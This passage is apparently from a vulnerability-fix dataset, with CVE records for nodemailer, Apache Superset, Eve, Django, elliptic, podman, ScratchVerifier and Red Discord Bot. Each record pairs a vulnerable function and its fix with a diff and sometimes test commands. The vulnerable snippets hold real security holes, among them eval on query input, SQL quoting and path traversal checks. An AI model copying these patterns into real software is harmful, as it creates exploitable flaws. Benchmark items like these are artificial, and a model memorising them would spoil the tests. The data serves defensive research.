_convertAddresses(addresses, uniqueList) {\n let values = [];\n\n uniqueList = uniqueList || [];\n\n [].concat(addresses || []).forEach(address => {\n if (address.address) {\n address.address = this._normalizeAddress(address.address);\n\n if (!address.name) {\n values.push(address.address.indexOf(' ') >= 0 ? `<${address.address}>` : `${address.address}`);\n } else if (address.name) {\n values.push(`${this._encodeAddressName(address.name)} <${address.address}>`);\n }\n\n if (address.address) {\n if (!uniqueList.filter(a => a.address === address.address).length) {\n uniqueList.push(address);\n }\n }\n } else if (address.group) {\n let groupListAddresses = (address.group.length ? this._convertAddresses(address.group, uniqueList) : '').trim();\n values.push(`${this._encodeAddressName(address.name)}:${groupListAddresses};`);\n }\n });\n\n return values.join(', ');\n }"}, {"id": "fix_js_137_2", "commit": "7e02648", "file_path": "lib/mime-node/index.js", "start_line": 1175, "end_line": 1213, "snippet": " _normalizeAddress(address) {\n address = (address || '')\n .toString()\n .replace(/[\\x00-\\x1F<>]+/g, ' ') // remove unallowed characters\n .trim();\n\n let lastAt = address.lastIndexOf('@');\n if (lastAt < 0) {\n // Bare username\n return address;\n }\n\n let user = address.substr(0, lastAt);\n let domain = address.substr(lastAt + 1);\n\n // Usernames are not touched and are kept as is even if these include unicode\n // Domains are punycoded by default\n // 'j\\u00f5geva.ee' will be converted to 'xn--jgeva-dua.ee'\n // non-unicode domains are left as is\n\n let encodedDomain;\n\n try {\n encodedDomain = punycode.toASCII(domain.toLowerCase());\n } catch (err) {\n // keep as is?\n }\n\n if (user.indexOf(' ') >= 0) {\n if (user.charAt(0) !== '\"') {\n user = '\"' + user;\n }\n if (user.substr(-1) !== '\"') {\n user = user + '\"';\n }\n }\n\n return `${user}@${encodedDomain}`;\n }"}], "vul_patch": "--- a/lib/mime-node/index.js\n+++ b/lib/mime-node/index.js\n@@ -8,9 +8,9 @@\n address.address = this._normalizeAddress(address.address);\n \n if (!address.name) {\n- values.push(address.address);\n+ values.push(address.address.indexOf(' ') >= 0 ? `<${address.address}>` : `${address.address}`);\n } else if (address.name) {\n- values.push(this._encodeAddressName(address.name) + ' <' + address.address + '>');\n+ values.push(`${this._encodeAddressName(address.name)} <${address.address}>`);\n }\n \n if (address.address) {\n@@ -19,9 +19,8 @@\n }\n }\n } else if (address.group) {\n- values.push(\n- this._encodeAddressName(address.name) + ':' + (address.group.length ? this._convertAddresses(address.group, uniqueList) : '').trim() + ';'\n- );\n+ let groupListAddresses = (address.group.length ? this._convertAddresses(address.group, uniqueList) : '').trim();\n+ values.push(`${this._encodeAddressName(address.name)}:${groupListAddresses};`);\n }\n });\n \n\n--- a/lib/mime-node/index.js\n+++ b/lib/mime-node/index.js\n@@ -1,11 +1,15 @@\n _normalizeAddress(address) {\n- address = (address || '').toString().trim();\n+ address = (address || '')\n+ .toString()\n+ .replace(/[\\x00-\\x1F<>]+/g, ' ') // remove unallowed characters\n+ .trim();\n \n let lastAt = address.lastIndexOf('@');\n if (lastAt < 0) {\n // Bare username\n return address;\n }\n+\n let user = address.substr(0, lastAt);\n let domain = address.substr(lastAt + 1);\n \n@@ -14,5 +18,22 @@\n // 'j\\u00f5geva.ee' will be converted to 'xn--jgeva-dua.ee'\n // non-unicode domains are left as is\n \n- return user + '@' + punycode.toASCII(domain.toLowerCase());\n+ let encodedDomain;\n+\n+ try {\n+ encodedDomain = punycode.toASCII(domain.toLowerCase());\n+ } catch (err) {\n+ // keep as is?\n+ }\n+\n+ if (user.indexOf(' ') >= 0) {\n+ if (user.charAt(0) !== '\"') {\n+ user = '\"' + user;\n+ }\n+ if (user.substr(-1) !== '\"') {\n+ user = user + '\"';\n+ }\n+ }\n+\n+ return `${user}@${encodedDomain}`;\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-49736", "cve_description": "A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement\u00a0would allow for SQL injection\u00a0in Apache Superset.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2.\n\nUsers are recommended to upgrade to version 3.0.2, which fixes the issue.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/apache/superset", "patch_url": ["https://github.com/apache/superset/commit/1d403dab9822a8cee6108669c53e53fad881c751", "https://github.com/apache/superset/commit/34101594e284ab3acce692f41aff7759ccb4bf1d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_19_1", "commit": "2f46890", "file_path": "superset/jinja_context.py", "start_line": 400, "end_line": 416, "snippet": "def where_in(values: list[Any], mark: str = \"'\") -> str:\n \"\"\"\n Given a list of values, build a parenthesis list suitable for an IN expression.\n\n >>> where_in([1, \"b\", 3])\n (1, 'b', 3)\n\n \"\"\"\n\n def quote(value: Any) -> str:\n if isinstance(value, str):\n value = value.replace(mark, mark * 2)\n return f\"{mark}{value}{mark}\"\n return str(value)\n\n joined_values = \", \".join(quote(value) for value in values)\n return f\"({joined_values})\""}, {"id": "vul_py_19_2", "commit": "2f46890", "file_path": "superset/jinja_context.py", "start_line": 427, "end_line": 452, "snippet": " def __init__(\n self,\n database: \"Database\",\n query: Optional[\"Query\"] = None,\n table: Optional[\"SqlaTable\"] = None,\n extra_cache_keys: Optional[list[Any]] = None,\n removed_filters: Optional[list[str]] = None,\n applied_filters: Optional[list[str]] = None,\n **kwargs: Any,\n ) -> None:\n self._database = database\n self._query = query\n self._schema = None\n if query and query.schema:\n self._schema = query.schema\n elif table:\n self._schema = table.schema\n self._extra_cache_keys = extra_cache_keys\n self._applied_filters = applied_filters\n self._removed_filters = removed_filters\n self._context: dict[str, Any] = {}\n self._env = SandboxedEnvironment(undefined=DebugUndefined)\n self.set_context(**kwargs)\n\n # custom filters\n self._env.filters[\"where_in\"] = where_in"}], "fix_func": [{"id": "fix_py_19_1", "commit": "1d403da", "file_path": "superset/jinja_context.py", "start_line": 401, "end_line": 433, "snippet": "class WhereInMacro: # pylint: disable=too-few-public-methods\n def __init__(self, dialect: Dialect):\n self.dialect = dialect\n\n def __call__(self, values: list[Any], mark: Optional[str] = None) -> str:\n \"\"\"\n Given a list of values, build a parenthesis list suitable for an IN expression.\n\n >>> from sqlalchemy.dialects import mysql\n >>> where_in = WhereInMacro(dialect=mysql.dialect())\n >>> where_in([1, \"Joe's\", 3])\n (1, 'Joe''s', 3)\n\n \"\"\"\n binds = [bindparam(f\"value_{i}\", value) for i, value in enumerate(values)]\n string_representations = [\n str(\n bind.compile(\n dialect=self.dialect, compile_kwargs={\"literal_binds\": True}\n )\n )\n for bind in binds\n ]\n joined_values = \", \".join(string_representations)\n result = f\"({joined_values})\"\n\n if mark:\n result += (\n \"\\n-- WARNING: the `mark` parameter was removed from the `where_in` \"\n \"macro for security reasons\\n\"\n )\n\n return result"}, {"id": "fix_py_19_2", "commit": "1d403da", "file_path": "superset/jinja_context.py", "start_line": 444, "end_line": 469, "snippet": " def __init__(\n self,\n database: \"Database\",\n query: Optional[\"Query\"] = None,\n table: Optional[\"SqlaTable\"] = None,\n extra_cache_keys: Optional[list[Any]] = None,\n removed_filters: Optional[list[str]] = None,\n applied_filters: Optional[list[str]] = None,\n **kwargs: Any,\n ) -> None:\n self._database = database\n self._query = query\n self._schema = None\n if query and query.schema:\n self._schema = query.schema\n elif table:\n self._schema = table.schema\n self._extra_cache_keys = extra_cache_keys\n self._applied_filters = applied_filters\n self._removed_filters = removed_filters\n self._context: dict[str, Any] = {}\n self._env = SandboxedEnvironment(undefined=DebugUndefined)\n self.set_context(**kwargs)\n\n # custom filters\n self._env.filters[\"where_in\"] = WhereInMacro(database.get_dialect())"}], "vul_patch": "--- a/superset/jinja_context.py\n+++ b/superset/jinja_context.py\n@@ -1,17 +1,33 @@\n-def where_in(values: list[Any], mark: str = \"'\") -> str:\n- \"\"\"\n- Given a list of values, build a parenthesis list suitable for an IN expression.\n+class WhereInMacro: # pylint: disable=too-few-public-methods\n+ def __init__(self, dialect: Dialect):\n+ self.dialect = dialect\n \n- >>> where_in([1, \"b\", 3])\n- (1, 'b', 3)\n+ def __call__(self, values: list[Any], mark: Optional[str] = None) -> str:\n+ \"\"\"\n+ Given a list of values, build a parenthesis list suitable for an IN expression.\n \n- \"\"\"\n+ >>> from sqlalchemy.dialects import mysql\n+ >>> where_in = WhereInMacro(dialect=mysql.dialect())\n+ >>> where_in([1, \"Joe's\", 3])\n+ (1, 'Joe''s', 3)\n \n- def quote(value: Any) -> str:\n- if isinstance(value, str):\n- value = value.replace(mark, mark * 2)\n- return f\"{mark}{value}{mark}\"\n- return str(value)\n+ \"\"\"\n+ binds = [bindparam(f\"value_{i}\", value) for i, value in enumerate(values)]\n+ string_representations = [\n+ str(\n+ bind.compile(\n+ dialect=self.dialect, compile_kwargs={\"literal_binds\": True}\n+ )\n+ )\n+ for bind in binds\n+ ]\n+ joined_values = \", \".join(string_representations)\n+ result = f\"({joined_values})\"\n \n- joined_values = \", \".join(quote(value) for value in values)\n- return f\"({joined_values})\"\n+ if mark:\n+ result += (\n+ \"\\n-- WARNING: the `mark` parameter was removed from the `where_in` \"\n+ \"macro for security reasons\\n\"\n+ )\n+\n+ return result\n\n--- a/superset/jinja_context.py\n+++ b/superset/jinja_context.py\n@@ -23,4 +23,4 @@\n self.set_context(**kwargs)\n \n # custom filters\n- self._env.filters[\"where_in\"] = where_in\n+ self._env.filters[\"where_in\"] = WhereInMacro(database.get_dialect())\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-49736:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/superset\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-49736/bin/python -m pytest tests/unit_tests/jinja_context_test.py::test_where_in -v\n", "unit_test_cmd": null} {"cve_id": "CVE-2018-8097", "cve_description": "io/mongo/parser.py in Eve (aka pyeve) before 0.7.5 allows remote attackers to execute arbitrary code via Code Injection in the where parameter.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/pyeve/eve", "patch_url": ["https://github.com/pyeve/eve/commit/f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98"], "programing_language": "Python", "vul_func": [{"id": "vul_py_221_1", "commit": "6d1526b", "file_path": "eve/io/mongo/parser.py", "start_line": 120, "end_line": 134, "snippet": " def visit_Call(self, node):\n \"\"\" A couple function calls are supported: bson's ObjectId() and\n datetime().\n \"\"\"\n if isinstance(node.func, ast.Name):\n expr = None\n if node.func.id == 'ObjectId':\n expr = \"('\" + node.args[0].s + \"')\"\n elif node.func.id == 'datetime':\n values = []\n for arg in node.args:\n values.append(str(arg.n))\n expr = \"(\" + \", \".join(values) + \")\"\n if expr:\n self.current_value = eval(node.func.id + expr)"}], "fix_func": [{"id": "fix_py_221_1", "commit": "f8f7019", "file_path": "eve/io/mongo/parser.py", "start_line": 120, "end_line": 137, "snippet": " def visit_Call(self, node):\n \"\"\" A couple function calls are supported: bson's ObjectId() and\n datetime().\n \"\"\"\n if isinstance(node.func, ast.Name):\n if node.func.id == 'ObjectId':\n try:\n self.current_value = ObjectId(node.args[0].s)\n except:\n pass\n elif node.func.id == 'datetime':\n values = []\n for arg in node.args:\n values.append(arg.n)\n try:\n self.current_value = datetime(*values)\n except:\n pass"}], "vul_patch": "--- a/eve/io/mongo/parser.py\n+++ b/eve/io/mongo/parser.py\n@@ -3,13 +3,16 @@\n datetime().\n \"\"\"\n if isinstance(node.func, ast.Name):\n- expr = None\n if node.func.id == 'ObjectId':\n- expr = \"('\" + node.args[0].s + \"')\"\n+ try:\n+ self.current_value = ObjectId(node.args[0].s)\n+ except:\n+ pass\n elif node.func.id == 'datetime':\n values = []\n for arg in node.args:\n- values.append(str(arg.n))\n- expr = \"(\" + \", \".join(values) + \")\"\n- if expr:\n- self.current_value = eval(node.func.id + expr)\n+ values.append(arg.n)\n+ try:\n+ self.current_value = datetime(*values)\n+ except:\n+ pass\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-39330", "cve_description": "An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the django.core.files.storage.Storage base class, when they override generate_filename() without replicating the file-path validations from the parent class, potentially allow directory traversal via certain inputs during a save() call. (Built-in Storage sub-classes are unaffected.)", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/9f4f63e9ebb7bf6cb9547ee4e2526b9b96703270", "https://github.com/django/django/commit/2b00edc0151a660d1eb86da4059904a0fc4e095e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_4_1", "commit": "156d318", "file_path": "django/core/files/storage/base.py", "start_line": 24, "end_line": 41, "snippet": " def save(self, name, content, max_length=None):\n \"\"\"\n Save new content to the file specified by name. The content should be\n a proper File object or any Python file-like object, ready to be read\n from the beginning.\n \"\"\"\n # Get the proper name for the file, as it will actually be saved.\n if name is None:\n name = content.name\n\n if not hasattr(content, \"chunks\"):\n content = File(content, name)\n\n name = self.get_available_name(name, max_length=max_length)\n name = self._save(name, content)\n # Ensure that the name returned from the storage system is still valid.\n validate_file_name(name, allow_relative_path=True)\n return name"}, {"id": "vul_py_4_2", "commit": "156d318", "file_path": "django/core/files/utils.py", "start_line": 7, "end_line": 24, "snippet": "def validate_file_name(name, allow_relative_path=False):\n # Remove potentially dangerous names\n if os.path.basename(name) in {\"\", \".\", \"..\"}:\n raise SuspiciousFileOperation(\"Could not derive file name from '%s'\" % name)\n\n if allow_relative_path:\n # Use PurePosixPath() because this branch is checked only in\n # FileField.generate_filename() where all file paths are expected to be\n # Unix style (with forward slashes).\n path = pathlib.PurePosixPath(name)\n if path.is_absolute() or \"..\" in path.parts:\n raise SuspiciousFileOperation(\n \"Detected path traversal attempt in '%s'\" % name\n )\n elif name != os.path.basename(name):\n raise SuspiciousFileOperation(\"File name '%s' includes path elements\" % name)\n\n return name"}], "fix_func": [{"id": "fix_py_4_1", "commit": "2b00edc0151a660d1eb86da4059904a0fc4e095e", "file_path": "django/core/files/storage/base.py", "start_line": 24, "end_line": 52, "snippet": " def save(self, name, content, max_length=None):\n \"\"\"\n Save new content to the file specified by name. The content should be\n a proper File object or any Python file-like object, ready to be read\n from the beginning.\n \"\"\"\n # Get the proper name for the file, as it will actually be saved.\n if name is None:\n name = content.name\n\n if not hasattr(content, \"chunks\"):\n content = File(content, name)\n\n # Ensure that the name is valid, before and after having the storage\n # system potentially modifying the name. This duplicates the check made\n # inside `get_available_name` but it's necessary for those cases where\n # `get_available_name` is overriden and validation is lost.\n validate_file_name(name, allow_relative_path=True)\n\n # Potentially find a different name depending on storage constraints.\n name = self.get_available_name(name, max_length=max_length)\n # Validate the (potentially) new name.\n validate_file_name(name, allow_relative_path=True)\n\n # The save operation should return the actual name of the file saved.\n name = self._save(name, content)\n # Ensure that the name returned from the storage system is still valid.\n validate_file_name(name, allow_relative_path=True)\n return name"}, {"id": "fix_py_4_2", "commit": "2b00edc0151a660d1eb86da4059904a0fc4e095e", "file_path": "django/core/files/utils.py", "start_line": 7, "end_line": 23, "snippet": "def validate_file_name(name, allow_relative_path=False):\n # Remove potentially dangerous names\n if os.path.basename(name) in {\"\", \".\", \"..\"}:\n raise SuspiciousFileOperation(\"Could not derive file name from '%s'\" % name)\n\n if allow_relative_path:\n # Ensure that name can be treated as a pure posix path, i.e. Unix\n # style (with forward slashes).\n path = pathlib.PurePosixPath(str(name).replace(\"\\\\\", \"/\"))\n if path.is_absolute() or \"..\" in path.parts:\n raise SuspiciousFileOperation(\n \"Detected path traversal attempt in '%s'\" % name\n )\n elif name != os.path.basename(name):\n raise SuspiciousFileOperation(\"File name '%s' includes path elements\" % name)\n\n return name"}], "vul_patch": "--- a/django/core/files/storage/base.py\n+++ b/django/core/files/storage/base.py\n@@ -11,7 +11,18 @@\n if not hasattr(content, \"chunks\"):\n content = File(content, name)\n \n+ # Ensure that the name is valid, before and after having the storage\n+ # system potentially modifying the name. This duplicates the check made\n+ # inside `get_available_name` but it's necessary for those cases where\n+ # `get_available_name` is overriden and validation is lost.\n+ validate_file_name(name, allow_relative_path=True)\n+\n+ # Potentially find a different name depending on storage constraints.\n name = self.get_available_name(name, max_length=max_length)\n+ # Validate the (potentially) new name.\n+ validate_file_name(name, allow_relative_path=True)\n+\n+ # The save operation should return the actual name of the file saved.\n name = self._save(name, content)\n # Ensure that the name returned from the storage system is still valid.\n validate_file_name(name, allow_relative_path=True)\n\n--- a/django/core/files/utils.py\n+++ b/django/core/files/utils.py\n@@ -4,10 +4,9 @@\n raise SuspiciousFileOperation(\"Could not derive file name from '%s'\" % name)\n \n if allow_relative_path:\n- # Use PurePosixPath() because this branch is checked only in\n- # FileField.generate_filename() where all file paths are expected to be\n- # Unix style (with forward slashes).\n- path = pathlib.PurePosixPath(name)\n+ # Ensure that name can be treated as a pure posix path, i.e. Unix\n+ # style (with forward slashes).\n+ path = pathlib.PurePosixPath(str(name).replace(\"\\\\\", \"/\"))\n if path.is_absolute() or \"..\" in path.parts:\n raise SuspiciousFileOperation(\n \"Detected path traversal attempt in '%s'\" % name\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-39330:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2024-39330/bin/python ./runtests.py file_storage.test_base file_storage.tests.FileStorageTests.test_file_save_broken_symlink file_uploads.tests.DirectoryCreationTests.test_not_a_directory", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-39330:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch /workspace/dep.patch\ncd tests && /workspace/PoC_env/CVE-2024-39330/bin/python ./runtests.py file_storage.tests file_uploads.tests"} {"cve_id": "CVE-2020-28498", "cve_description": "The package elliptic before 6.5.4 are vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed.", "cwe_info": {"CWE-327": {"name": "Use of a Broken or Risky Cryptographic Algorithm", "description": "The product uses a broken or risky cryptographic algorithm or protocol."}}, "repo": "https://github.com/indutny/elliptic", "patch_url": ["https://github.com/indutny/elliptic/commit/441b7428b0e8f6636c42118ad2aaa186d3c34c3f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_233_1", "commit": "e71b2d9", "file_path": "lib/elliptic/ec/key.js", "start_line": 102, "end_line": 104, "snippet": "KeyPair.prototype.derive = function derive(pub) {\n return pub.mul(this.priv).getX();\n};"}], "fix_func": [{"id": "fix_js_233_1", "commit": "441b7428b0e8f6636c42118ad2aaa186d3c34c3f", "file_path": "lib/elliptic/ec/key.js", "start_line": 102, "end_line": 108, "snippet": "KeyPair.prototype.derive = function derive(pub) {\n if(!pub.validate()) {\n assert(pub.validate(), 'public point not validated');\n }\n return pub.mul(this.priv).getX();\n};\n"}], "vul_patch": "--- a/lib/elliptic/ec/key.js\n+++ b/lib/elliptic/ec/key.js\n@@ -1,3 +1,6 @@\n KeyPair.prototype.derive = function derive(pub) {\n+ if(!pub.validate()) {\n+ assert(pub.validate(), 'public point not validated');\n+ }\n return pub.mul(this.priv).getX();\n };\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-10856", "cve_description": "It has been discovered that podman before version 0.6.1 does not drop capabilities when executing a container as a non-root user. This results in unnecessary privileges being granted to the container.", "cwe_info": {"CWE-732": {"name": "Incorrect Permission Assignment for Critical Resource", "description": "The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors."}}, "repo": "https://github.com/projectatomic/libpod", "patch_url": ["https://github.com/projectatomic/libpod/commit/bae80a0b663925ec751ad2784ca32989403cdc24"], "programing_language": "Go", "vul_func": [{"id": "vul_go_213_1", "commit": "e6b088f", "file_path": "pkg/spec/spec.go", "start_line": 390, "end_line": 403, "snippet": "func setupCapabilities(config *CreateConfig, configSpec *spec.Spec) error {\n\tvar err error\n\tvar caplist []string\n\tcaplist, err = caps.TweakCapabilities(configSpec.Process.Capabilities.Bounding, config.CapAdd, config.CapDrop)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconfigSpec.Process.Capabilities.Bounding = caplist\n\tconfigSpec.Process.Capabilities.Permitted = caplist\n\tconfigSpec.Process.Capabilities.Inheritable = caplist\n\tconfigSpec.Process.Capabilities.Effective = caplist\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_213_1", "commit": "bae80a0b663925ec751ad2784ca32989403cdc24", "file_path": "pkg/spec/spec.go", "start_line": 391, "end_line": 422, "snippet": "\tuseNotRoot := func(user string) bool {\n\t\tif user == \"\" || user == \"root\" || user == \"0\" {\n\t\t\treturn false\n\t\t}\n\t\treturn true\n\t}\n\n\tvar err error\n\tvar caplist []string\n\tbounding := configSpec.Process.Capabilities.Bounding\n\tif useNotRoot(config.User) {\n\t\tconfigSpec.Process.Capabilities.Bounding = caplist\n\t}\n\tcaplist, err = caps.TweakCapabilities(configSpec.Process.Capabilities.Bounding, config.CapAdd, config.CapDrop)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconfigSpec.Process.Capabilities.Bounding = caplist\n\tconfigSpec.Process.Capabilities.Permitted = caplist\n\tconfigSpec.Process.Capabilities.Inheritable = caplist\n\tconfigSpec.Process.Capabilities.Effective = caplist\n\tconfigSpec.Process.Capabilities.Ambient = caplist\n\tif useNotRoot(config.User) {\n\t\tcaplist, err = caps.TweakCapabilities(bounding, config.CapAdd, config.CapDrop)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tconfigSpec.Process.Capabilities.Bounding = caplist\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/spec/spec.go\n+++ b/pkg/spec/spec.go\n@@ -1,6 +1,16 @@\n-func setupCapabilities(config *CreateConfig, configSpec *spec.Spec) error {\n+\tuseNotRoot := func(user string) bool {\n+\t\tif user == \"\" || user == \"root\" || user == \"0\" {\n+\t\t\treturn false\n+\t\t}\n+\t\treturn true\n+\t}\n+\n \tvar err error\n \tvar caplist []string\n+\tbounding := configSpec.Process.Capabilities.Bounding\n+\tif useNotRoot(config.User) {\n+\t\tconfigSpec.Process.Capabilities.Bounding = caplist\n+\t}\n \tcaplist, err = caps.TweakCapabilities(configSpec.Process.Capabilities.Bounding, config.CapAdd, config.CapDrop)\n \tif err != nil {\n \t\treturn err\n@@ -10,5 +20,13 @@\n \tconfigSpec.Process.Capabilities.Permitted = caplist\n \tconfigSpec.Process.Capabilities.Inheritable = caplist\n \tconfigSpec.Process.Capabilities.Effective = caplist\n+\tconfigSpec.Process.Capabilities.Ambient = caplist\n+\tif useNotRoot(config.User) {\n+\t\tcaplist, err = caps.TweakCapabilities(bounding, config.CapAdd, config.CapDrop)\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n+\tconfigSpec.Process.Capabilities.Bounding = caplist\n \treturn nil\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-26236", "cve_description": "In ScratchVerifier before commit a603769, an attacker can hijack the verification process to log into someone else's account on any site that uses ScratchVerifier for logins. A possible exploitation would follow these steps: 1. User starts login process. 2. Attacker attempts login for user, and is given the same verification code. 3. User comments code as part of their normal login. 4. Before user can, attacker completes the login process now that the code is commented. 5. User gets a failed login and attacker now has control of the account. Since commit a603769 starting a login twice will generate different verification codes, causing both user and attacker login to fail. For clients that rely on a clone of ScratchVerifier not hosted by the developers, their users may attempt to finish the login process as soon as possible after commenting the code. There is no reliable way for the attacker to know before the user can finish the process that the user has commented the code, so this vulnerability only really affects those who comment the code and then take several seconds before finishing the login.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/ScratchVerifier/ScratchVerifier", "patch_url": ["https://github.com/ScratchVerifier/ScratchVerifier/commit/a603769010abf8c1bede91af46e4945314e4aa4a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_379_1", "commit": "2170fc56a64aeb40a0936702a9c3281f716c6405", "file_path": "backend/db.py", "start_line": 160, "end_line": 185, "snippet": " async def start_verification(self, client_id, username):\n async with self.lock:\n await self.db.execute('SELECT code FROM scratchverifier_usage WHERE \\\nclient_id=? AND username=?', (client_id, username))\n row = await self.db.fetchone()\n if row is not None:\n await self.db.execute('UPDATE scratchverifier_usage SET expiry=? \\\nWHERE client_id=? AND username=? AND code=?', (int(time.time()) + VERIFY_EXPIRY,\n client_id, username, row[0]))\n return row[0]\n code = sha256(\n str(client_id).encode()\n + str(time.time()).encode()\n + username.encode()\n + token_bytes()\n # 0->A, 1->B, etc, to avoid Scratch's phone number censor\n ).hexdigest().translate({ord('0') + i: ord('A') + i for i in range(10)})\n await self.db.execute('INSERT INTO scratchverifier_usage (client_id, \\\ncode, username, expiry) VALUES (?, ?, ?, ?)', (client_id, code, username,\n int(time.time() + VERIFY_EXPIRY)))\n await self.db.execute('INSERT INTO scratchverifier_logs (client_id, \\\nusername, log_time, log_type) VALUES (?, ?, ?, ?)', (client_id, username,\n int(time.time()), 1))\n await self.db.execute('DELETE FROM scratchverifier_usage WHERE \\\nexpiry<=?', (int(time.time()),))\n return code"}], "fix_func": [{"id": "fix_py_379_1", "commit": "a603769010abf8c1bede91af46e4945314e4aa4a", "file_path": "backend/db.py", "start_line": 160, "end_line": 186, "snippet": " async def start_verification(self, client_id, username):\n async with self.lock:\n await self.db.execute('SELECT code FROM scratchverifier_usage WHERE \\\nclient_id=? AND username=?', (client_id, username))\n row = await self.db.fetchone()\n code = sha256(\n str(client_id).encode()\n + str(time.time()).encode()\n + username.encode()\n + token_bytes()\n # 0->A, 1->B, etc, to avoid Scratch's phone number censor\n ).hexdigest().translate({ord('0') + i: ord('A') + i for i in range(10)})\n if row is not None:\n await self.db.execute(\n 'UPDATE scratchverifier_usage SET expiry=?, code=? \\\nWHERE client_id=? AND username=?', (int(time.time()) + VERIFY_EXPIRY,\n code, client_id, username))\n return code\n await self.db.execute('INSERT INTO scratchverifier_usage (client_id, \\\ncode, username, expiry) VALUES (?, ?, ?, ?)', (client_id, code, username,\n int(time.time() + VERIFY_EXPIRY)))\n await self.db.execute('INSERT INTO scratchverifier_logs (client_id, \\\nusername, log_time, log_type) VALUES (?, ?, ?, ?)', (client_id, username,\n int(time.time()), 1))\n await self.db.execute('DELETE FROM scratchverifier_usage WHERE \\\nexpiry<=?', (int(time.time()),))\n return code"}], "vul_patch": "--- a/backend/db.py\n+++ b/backend/db.py\n@@ -3,11 +3,6 @@\n await self.db.execute('SELECT code FROM scratchverifier_usage WHERE \\\n client_id=? AND username=?', (client_id, username))\n row = await self.db.fetchone()\n- if row is not None:\n- await self.db.execute('UPDATE scratchverifier_usage SET expiry=? \\\n-WHERE client_id=? AND username=? AND code=?', (int(time.time()) + VERIFY_EXPIRY,\n- client_id, username, row[0]))\n- return row[0]\n code = sha256(\n str(client_id).encode()\n + str(time.time()).encode()\n@@ -15,6 +10,12 @@\n + token_bytes()\n # 0->A, 1->B, etc, to avoid Scratch's phone number censor\n ).hexdigest().translate({ord('0') + i: ord('A') + i for i in range(10)})\n+ if row is not None:\n+ await self.db.execute(\n+ 'UPDATE scratchverifier_usage SET expiry=?, code=? \\\n+WHERE client_id=? AND username=?', (int(time.time()) + VERIFY_EXPIRY,\n+ code, client_id, username))\n+ return code\n await self.db.execute('INSERT INTO scratchverifier_usage (client_id, \\\n code, username, expiry) VALUES (?, ?, ?, ?)', (client_id, code, username,\n int(time.time() + VERIFY_EXPIRY)))\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-15278", "cve_description": "Red Discord Bot before version 3.4.1 has an unauthorized privilege escalation exploit in the Mod module. This exploit allows Discord users with a high privilege level within the guild to bypass hierarchy checks when the application is in a specific condition that is beyond that user's control. By abusing this exploit, it is possible to perform destructive actions within the guild the user has high privileges in. This exploit has been fixed in version 3.4.1. As a workaround, unloading the Mod module with unload mod or, disabling the massban command with command disable global massban can render this exploit not accessible. We still highly recommend updating to 3.4.1 to completely patch this issue.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an 